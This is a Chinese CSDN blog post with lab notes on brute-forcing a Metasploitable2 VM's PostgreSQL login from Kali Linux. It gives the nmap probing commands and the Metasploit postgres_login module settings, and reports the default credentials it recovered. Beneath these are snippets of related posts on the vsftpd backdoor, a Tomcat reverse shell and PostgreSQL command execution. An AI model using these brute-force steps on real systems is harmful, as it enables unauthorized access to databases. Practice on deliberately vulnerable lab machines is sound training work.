kali linux对Metasploitable2漏洞利用,postgresql爆力破解 笔记

最新推荐文章于 2022-11-24 10:52:12 发布
最新推荐文章于 2022-11-24 10:52:12 发布
阅读量648 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30508729/article/details/101040505
版权

PostgreSQL是以加州大学伯克利分校计算机系开发的 POSTGRES,现在已经更名为PostgreSQL,版本 4.2为基础的对象关系型数据库管理系统(ORDBMS)。PostgreSQL支持大部分 SQL标准并且提供了许多其他现代特性:复杂查询、外键、触发器、视图、事务完整性、MVCC。同样,PostgreSQL 可以用许多方法扩展,比如, 通过增加新的数据类型、函数、操作符、聚集函数、索引。免费使用、修改、和分发 PostgreSQL,不管是私用、商用、还是学术研究使用。 https://www.postgresql.org/

实验环境:

攻击机:kali linux 
ip:192.168.172.134
目标机:Metasploittable2
ip:192.168.172.129

攻击过程:

step1:探测

nmap 192.168.172.129

nmap -sV -p 5432 192.168.172.129

step2:爆破

启动msf

命令:useauxliary/scanner/postgres/postgres_login

show options

set rhosts 192.168.172.129

set user_file /root/Desktop/username.txt

set pass_file /root/Desktop/passowrd.txt

exploit

爆破成功

用户名密码为:postgres

02be55f
关注
kali linux攻击靶机Metasploitable2实验------vsFTPd手工触发漏洞
边城浪子的博客
07-27 1274
漏洞:vsftpd手工出发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。 靶机:Metasploitable2 step1:开启kali linuxMetasploitable2 step2:扫描漏洞 命令:nmap --script vuln 目标ip nmap --script vuln -p 21192.168.5...
Metasploitable2 - tcp port 5432 - postgres
Nixawk
07-31 1204
msf auxiliary(postgres_readfile) > show options Module options (auxiliary/admin/postgres/postgres_readfile):    Name      Current Setting  Required  Description    ----      ---------------  -
kali linuxMetasploitable2漏洞利用,mysql爆力破解 笔记
边城浪子的博客
09-19 1270
MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。MySQL 是最流行的关系型数据库管理系统之一,在 WEB 应用方面,MySQL是最好的 RDBMS (Relational Database Management System,关系数据库管理系统) 应用软件。 MySQL是一种关系数据库管理系统,关系数据库将数据保存在不同的表中,而不是将所...
kali linuxMetasploitable2漏洞利用,ProFTPD爆力破解 笔记
边城浪子的博客
09-19 552
ProFTPD:一个Unix平台上或是类Unix平台上(如Linux, FreeBSD等)的FTP服务器程序 http://www.proftpd.org/ 实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:Metasploittable2 ip:192.168.172.129 攻击过程: step1:探测 nmap -sV -p2121 192...
linux渗透测试Metasploit模块(暴力破解数据库密码)
forget_mt的博客
11-23 2517
前言 学习内容:通过Metasploit暴力破解数据库密码,并在数据库中写入一句话木马。 渗透机:172.16.5.196 含有字典2.txt 靶机:172.16.5.192 安装了mysql vsftpd服务 要保证渗透机与靶机要ping的通 1.输入msfconsole启动Metasploit,使用/auxiliary/scanner/mysql/mysql_login use /auxiliary/scanner/mysql/mysql_login 2.设置目标IP地址...
kali linuxMetasploitable2漏洞利用,tomcat管理用户爆力破解/利用tomcat upload 功能反弹shel笔记
边城浪子的博客
09-20 775
Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。默认情况下,8180端口是tomcat管理的HTTP端口 实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:Metasploittable2 ip:192.168.172.129 攻...
kali Linux系统的漏洞利用
最新发布
06-19
### Kali Linux系统的漏洞利用 #### 一、Metasploitable操作系统 Metasploitable是一款专为安全测试和渗透测试设计的操作系统,基于Ubuntu Linux。它预装了一系列易受攻击的服务和应用程序,使得安全专家可以方便...
安全课堂kali linux笔记1~100课.zip
07-27
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni...目前Kali Linux的最新版本为2019.2,增加了对RTL8812AU网卡的支持
linux 漏洞靶机,【漏洞验证】Metasploitable2靶机漏洞复现
weixin_39796878的博客
05-16 1088
文章目录Metasploitable2靶机漏洞复现1、TWiki 'rev' Parameter Arbitrary Command Execution2、VNC Server 'password' Password3、Ingreslock 后门漏洞4、UnrealIRCd Backdoor(ircd)5、 PHP-CGI Query String Parameter Injection Arbi...
6-22漏洞利用-postgresql数据库密码破解
山兔的博客
07-31 1475
PostgreSQL是关系数据库,加州大学伯克利分校计算机系开发的POSTGRES,现在已经更名为PostgreSQL,版本4.2为基础的对象关系型数据库管理系统(ORDBMS)。PostgreSQL支持大部分SQL标准并且提供了许多其他现代特性复杂查询、外键、触发器、视图、事务完整性、MVCC。同样,PostgreSQL可以用许多方法扩展,比如,通过增加新的数据类型、函数、操作符、聚集函数、索引。免费使用、修改和分发PostgreSQL,不管是私用、商用,还是学术研究使用。https。...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)
EC_Carrot的博客
07-21 497
漏洞简介 PostgreSQLPostgreSQL组织的一套自由的对象关系型数据库管理系统。该系统支持大部分SQL标准并且提供了许多其他特性,例如外键、触发器、视图等。 PostgreSQL 9.3至11.2版本中的导入导出数据命令‘COPY TO/FROM PROGRAM’存在操作系统命令注入漏洞。攻击者可利用该漏洞获取数据库超级用户权限,从而执行任意系统命令。 漏洞复现 我使用的是vulhub的环境,默认账号密码为postgres/postgres 登陆PostgreSQL:psql --host y
PostgreSql详细介绍(四)
m0_37253968的博客
11-20 473
PostgreSQL 学习手册(索引) 一、索引的类型: PostgreSQL 提供了多 种索引类型:B-Tree、Hash、GiST 和 GIN,由于它们使用了不同的算法,因此每种索引类型都有其 适合的查询类型,缺省时,CREATE INDEX 命令将创建 B-Tree 索引。 1. B-Tree: CREATE TABLE test1 ( ...
攻击PostgresSQL登录的6种方法
渗透测试研究中心
08-06 158
Hydra通常是首选工具,它可以对50多种协议执行快速字典暴力攻击,包括telnet,postgres,http,https,smb服务和各种数据库等。它支持许多协议如:AFP,CVS,POSTGRES,HTTP,IMAP,rlogin,SSH,Subversion和VNC等。Patator是一款基于多功能的爆破工具,采用模块化设计,使用灵活。一旦执行命令,将开始使用密码字典进行攻击,因此很快获取到正确的用户名和密码。从下面给出的截图中,可以看到密码字典攻击的过程,因此,您将获得正确的用户名和密码。
kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程
08-06 2568
kali-漏洞利用】应用渗透攻击过程
Kali系统MSF模块暴力破解MySQL弱口令漏洞
mooyuan的博客
11-24 9509
攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具。这里要特别强调:被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306,故而一般情况下要求被攻击的服务器开启了3306端口号。
手把手教你kali渗透Metasploitable
热门推荐
qq_41620273的博客
12-24 1万+
记一次kali渗透Metasploitbale靶机 1.网络设置 2.ifconfig查看Metasploitable的IP: 3.对Metasploitbale进行nmap端口扫描: Nmap 192.168.22.128 端口爆破:FTP、SSH等 工具:Hydra 备用字典:user.txt: pass,txt: 一、 爆破FTP hydra -L /root/桌面/user.txt -P /root/桌面/pass.txt [ftp://192.168.22.128](ftp://19
渗透之——kali Metasploit 连接 Postgresql 默认密码
冰河的专栏
01-20 3021
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86563805 1.启动 postgresql service postgresql start postgresql开机自启动 update-rc.d postgresql enable 2.自行测试 postgresql 是否安装成功 根据需要,自行 修改 po...
kali linuxMetasploitable2漏洞利用,后门连接 笔记
边城浪子的博客
09-19 849
实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:Metasploittable2 ip:192.168.172.129 攻击过程: step1:使用nmap 扫描靶机 nmap 192.168.172.129 step2:发现存在1524/tcp open ingreslock,进一步扫描详细信息 nmap -sV -p 1524 192.16...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值